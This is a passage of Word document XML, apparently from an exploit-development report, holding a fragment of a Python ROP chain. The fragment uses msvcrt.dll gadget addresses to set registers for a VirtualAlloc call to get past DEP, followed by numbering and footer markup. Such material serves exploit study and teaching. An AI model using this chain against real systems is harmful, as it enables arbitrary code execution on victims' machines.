      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>38081,  #</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> ADD EAX,5E40C033 # RETN [msvcrt.dll]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08C3882D" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">      0x77c58</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>fbc,  #</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> XCHG EAX,EDX # RETN [msvcrt.dll]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="504BE55D"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_to_set_ecx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>:---]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AAAF169" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">      0x77c4</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>debf,  #</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> POP EAX # RETN [msvcrt.dll]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AFC0DB4" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">      0x36ffff8</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>e,  #</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> put delta into </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>eax</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> (-&gt; put 0x00000040 into </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>ecx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12A693F3" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">      0x77c4c78</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>a,  #</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> ADD EAX,C90000B2 # RETN [msvcrt.dll]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B8697CA" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">      0x77c</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>14001,  #</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> XCHG EAX,ECX # RETN [msvcrt.dll]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1579D0F0"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_to_set_edi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>:---]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D5155A2" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">      0x77c2e</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>942,  #</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> POP EDI # RETN [msvcrt.dll]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="344F2EE0" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">      0x77c47a</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>42,  #</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> RETN (ROP NOP) [msvcrt.dll]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CC60723" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">      #[---</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>INFO:gadgets</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>_to_set_esi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>:---]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="340CB9A9" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">      0x77c3b4</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>ed,  #</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> POP ESI # RETN [msvcrt.dll]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="673B4A1B" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">      0x77c2</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>aacc,  #</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> JMP [EAX] [msvcrt.dll]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6896D31C" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">      0x77c</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>52217,  #</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> POP EAX # RETN [msvcrt.dll]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D2DC930" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">      0x77c1110</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>c,  #</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>ptr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> to &amp;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>VirtualAlloc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>() [IAT msvcrt.dll]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="608C257B" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">      #[---</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>INFO:pushad</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>:---]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B86C103" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">      0x77c12df</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>9,  #</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> PUSHAD # RETN [msvcrt.dll]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BA78E6A" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">      #[---</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>INFO:extras</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>:---]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="660F824D" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">      0x77c</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>35459,  #</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>ptr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> to 'push </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>esp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> # ret ' [msvcrt.dll]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C069F4F" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    ]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="251A83A6" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    return '</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>'.join</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>struct.pack</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">('&lt;I', _) for _ in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>rop_gadgets</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05394B27" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00164B2A">
      <w:pPr>
        <w:pStyle w:val="code"/>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0204D477" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>rop_chain</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>create_rop_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>chain</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E577CAD" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00164B2A">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:spacing w:after="0"/>
        <w:ind w:right="1229"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D56A91A" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00164B2A">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:ind w:right="919"/>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00164B2A">
      <w:footerReference w:type="defaul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F5E33" w14:textId="77777777" w:rsidR="00FA14F0" w:rsidRDefault="00FA14F0">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="14BBC047" w14:textId="77777777" w:rsidR="00FA14F0" w:rsidRDefault="00FA1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6BD7C" w14:textId="77777777" w:rsidR="00C77908" w:rsidRDefault="00C77908">
    <w:pPr>
      <w:pStyle w:val="Footer"/>
    </w:pPr>
    <w:r>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CCB93" w14:textId="77777777" w:rsidR="00C77908" w:rsidRDefault="00C77908">
    <w:pPr>
      <w:pStyle w:val="Footer"/>
      <w:pBdr>
        <w:top w:val="single" w:sz="4" w:space="1" w:color="D9D9D9"/>
      </w:pBdr>
      <w:jc w:val="right"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:b/>
        <w:bCs/>
      </w:rPr>
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:b/>
        <w:bCs/>
      </w:rPr>
      <w:instrText xml:space="preserve"> PAGE </w:instrText>
    </w:r>
    <w:r>
      <w:rPr>
        <w:b/>
        <w:bCs/>
      </w:rPr>
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:b/>
        <w:bCs/>
      </w:rPr>
      <w:t>20</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:b/>
        <w:bCs/>
      </w:rPr>
      <w:fldChar w:fldCharType="end"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:b/>
        <w:bCs/>
      </w:rPr>
      <w:t xml:space="preserve"> | </w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:color w:val="7F7F7F"/>
        <w:spacing w:val="60"/>
      </w:rPr>
      <w:t>Page</w:t>
    </w:r>
  </w:p>
  <w:p w14:paraId="226AAE7B" w14:textId="77777777" w:rsidR="00C77908" w:rsidRDefault="00C77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0EABA" w14:textId="77777777" w:rsidR="00FA14F0" w:rsidRDefault="00FA14F0">
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="7FC4DD42" w14:textId="77777777" w:rsidR="00FA14F0" w:rsidRDefault="00FA1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16665"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="DAC416A0"/>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027C35"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="923CB1AC"/>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1D2733"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F086EB7A"/>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36A02FB"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="29DC42FE"/>
    <w:styleLink w:val="WWNum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BD1A03"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="43D831A6"/>
    <w:styleLink w:val="WWNum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A56964"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="EC3A0F32"/>
    <w:styleLink w:val="WWNum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A6D72FF"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E5520536"/>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2490CFF"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7F043306"/>
    <w:styleLink w:val="WWNum29"/>
    <w:lvl w:ilvl="0">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1080" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:eastAsia="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15:restartNumberingAfterBreak="0">
    <w:nsid w:val="27CE4981"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3B30EDBE"/>
    <w:styleLink w:val="WW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8A208EB"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9D52FD0E"/>
    <w:styleLink w:val="WWNum2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296428A5"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="EA84632E"/>
    <w:styleLink w:val="WWNum33"/>
    <w:lvl w:ilvl="0">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1080" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:eastAsia="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A7805B2"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="716CB6F0"/>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07C43E6"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3C3AD9C8"/>
    <w:styleLink w:val="WWNum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1F438B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="BB7AD5E4"/>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CF53E1F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="BA086616"/>
    <w:styleLink w:val="WWNum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05318E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A1666656"/>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FA60046"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="52364B50"/>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4775976"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="AC98EFEA"/>
    <w:styleLink w:val="WWNum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4CD2668"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="40348F6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9" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="460E5A55"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="6F6A92B4"/>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none"/>
      <w:lvlText w:val="%3"/>
      <w:lvlJc w:val="left"/>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64A3CC9"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5F1ADB8A"/>
    <w:styleLink w:val="WWNum1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472055B2"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C77EE3AE"/>
    <w:styleLink w:val="WWNum2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2" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="48CB63F0"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5B842C16"/>
    <w:styleLink w:val="WWNum31"/>
    <w:lvl w:ilvl="0">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1089" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1449" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2169" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2889" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3609" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4329" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5049" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5769" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6489" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="23" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="4A9E4C4C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="AE300884"/>
    <w:styleLink w:val="WWNum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EDA4A1E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="61F432DA"/>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021563A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7868A9EE"/>
    <w:styleLink w:val="WWNum3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08A7981"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="58D0A73A"/>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1F57B06"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="DF3E0C3C"/>
    <w:styleLink w:val="WWNum3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35D56E3"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="262EFCE6"/>
    <w:styleLink w:val="WWNum35"/>
    <w:lvl w:ilvl="0">
      <w:numFmt w:val="bullet"/>
